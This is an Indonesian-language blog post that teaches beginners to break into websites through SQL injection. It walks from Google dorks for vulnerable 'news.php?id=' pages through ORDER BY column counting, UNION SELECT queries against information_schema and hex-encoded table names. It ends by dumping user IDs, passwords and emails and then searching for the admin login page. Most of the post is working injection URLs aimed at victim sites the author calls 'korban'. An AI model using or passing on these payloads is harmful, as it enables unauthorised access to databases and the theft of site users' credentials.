1. tak perlulah rokok cemilan segala macam lgsg jee...eh tp kopi perlulah soalnya kadang boring,,e=ah sambil ngerokok tak apalah makan makan dikit jee (@gw :munafik gw)
buka google dan pake dork : (ini klo yg belom tw ex: inurl:/news.php?id= atau berita.php... bla bla segala macam dan ada di google ketik aja dork )
2. dan setelah ketemu tambahkan karakter ' atau "-" untuk melihat apakah ada pesan error.
ex : www.siapagitu.com/news.php?id=100' atau
www.siapagitu.com/news.php?id=-100
3. cari jumlah table . caranya target linkny kyk gini www.siapagitu.com/blablabla.php?blabla.php?id=23
truz ubah formatnya jadi : www.siapa gitu.com/blabla.php?id=-23 dan masukan rumus longfield einstein
contoh: www.siapagitu.com/berita.php?id=-23+order+by+1-- atau
www.siapagitu.com/berita.php?id=-23+order+by+1/*
ceklah truzz ampe bosan (zzz -_-")
ex : www.siapagitu.com/berita.php?id=-100+order+by+1--
www.siapagitu.com/berita.php?id=-100+order+by+2--
truuzzz...
www.siapagitu.com/berita.php?id=-100+order+by+20an--
sampe datang tukang pos bilang bla bla bla eror coy atau halaman td mengeluarkan pesan error
jika errornya di www.siapagitu.com/blabla.php?id=5 jadi kita tangkap bahwa 5 nomor gagal dan 4 angka sebelumnya adalah nomor togel (di ingat nih nomor)
4. truzz lgkh selanjutnya cari nomor dewa (nomor ini jga perlu di inget) cara mencari nomor ini :
pake rumus baru +union+select+1,2,3,4,-- (kan td nomor togelnya 4 jadi kita berenti di angka 4,klo misal td di angka 8 jadinya yaa tambah donk angka td ...........4,5,6,7,8-- )
lalu tekan enter dan nanti akan keluar nomor dewa. ingat lagi ni nomor.contoh angka dewanya 2
lalu cari versi yg diapakai situ kelinci percobaan td. masukan perintah tsb pada nagka yg keluar tadi
misal: www.siapagitu.com/blabla.php?id=-23+union+select+1,version(),3--
ingat letak version() harus di angka dewa
nanti akan terlihat versinya contoh : 5.0.1.12 klo di bawah versi 5 berarti cari target lain krn kita harus nebak sndiri tablenya kan pusing nebak nebak ndiri.
5. nah sekarang table . cara nyari table dengan rumus baru lagi.
cara nampilin tabel dari korban td yaitu dengan
rumus : table_name -dimasukan pada angka dewa keluar tadi-
rumus : +from+information_schema.tables-- -dimasukan setelah angka terakhir-
www.siapagitu.com/blabla.php?id=-23+union+select+1,table_name,3+from+information_schema.tables--
nanti akan kluar nama table (yg ini macam macam ada yg table character_set,, atau artikel atau produk dan lain lain yang tidak bisa saya sebutkan satu persatu. terima kasih (kyk celeb dpt award aja..wkwkwkwk)
6. sekarang kan nama table dah dapt tuh waktunya kita sadap isi table. apa sich isi table td (contoh : kadang saya nemu di table ada yang isinya id,userid,username,member,mem_pass,email dan ada pula admin dan pass). untuk melihat isi dalam celana dalam si tabel kita pake lagi rumus baru
rumus : group_concat(table_name) -dimasukan pada angka dewa yang keluar tadi-
rumus : +from+information_schema.tables+where+table_schema=database() -dimasukan setelah angka terakhir-
dan nanti format urlnya jadi gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--
dan selanjutnya convert nama table td di situs banyaklah contoh : Ascii Converter yg ini caranya buat dengan karya sendiri (kan bangga) masukkin huruf table td di sana satu satu misalakan nama table yg di dapat td table member maka masukkin dari m convert b convert dan seterusnya.. eit ini cara satu dan ada lagi yg lebih gampang dengan converter online di situs http://www.dolcevie.com/js/converter.html ingat klo hasil convert nya ada simbol kyk : atau @ dan segala macam hilangkan saja dan ambil huruf dan angkanya jadi misalkan 23:1d:4b:45 jadi ambil angka dan huruf hingga jadi 231d4b45... ini juga di catat hasil convertnya..siip?
selanjutnya carilah column dengan rumus baru lagi..
rumus : group_concat(column_name) -dimasukan pada angka dewa yg keluar tadi-
rumus : +from+information_schema.columns+where+table_name=0xhexa-- -dimasukan setelah angka terakhir
jadi nanti format urlnya :
www.siapagitu.com/blabla.php?id=-100+union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x(angka hasil converter td)--
nah setelah tekan enter maka akan keluar hasil columnnya .. isi dari column ada id,pass,user,member bla bla dan banyak lagi...contoh nya jika yang keluar td adlah : id,pass,email maka kita beranjak ke tahap selanjutnya
7. rumus baru lagi untuk tahap berikut :
rumus : concat_ws(0x3a,hasil isi column yg mau dikeluarkan) -dimasukan pada angka yg keluar tadi-
rumus : +from+(nama table berasal) - dimasukan setelah angka terakhir-
jadi format urlnya kyk gini :
www.siapagitu.com/blabla.php?id=-23+union+select+1,2,3,4,concat_ws(0x3a,id,pass,email),6,7,8+from+(nama table berasal)-- nama tabel berasal maksudnya td kan tabel yg kita dapat di awal sebelum dapat column yg kyk character_set,,,atau admin,,,atau,,,tabel member dan segala macam...
setelah tekan enter : TARAAA ANDA MENDAPATKAN ID,PASS,DAN EMAIL DARI KORBAN
8.nah terakhir kita cari halam login dari situs ex : www.siapagitu.com/admin.php atau ................/login.php atau ................/cpnel dan banyak lagi tergantung usaha anda mencari dengan nalar dan pengalaman
maaf sebelumnya jika saya menjelaskan agak berbelit belit karena perut lagi melilit mw pergi ngacrit...SALAM NEWBIE saya bwt sesepuh kalo nanti melihat.. karena saya tidak mw dikira sombong...saya cuma newbie kk.....dan masih perlu belajar lagi... thx kk kk yg sudah baca leave comment please karena jarang ada yg ngoment
==================================================================
1 komentar:
mantap... :e:
Post a Comment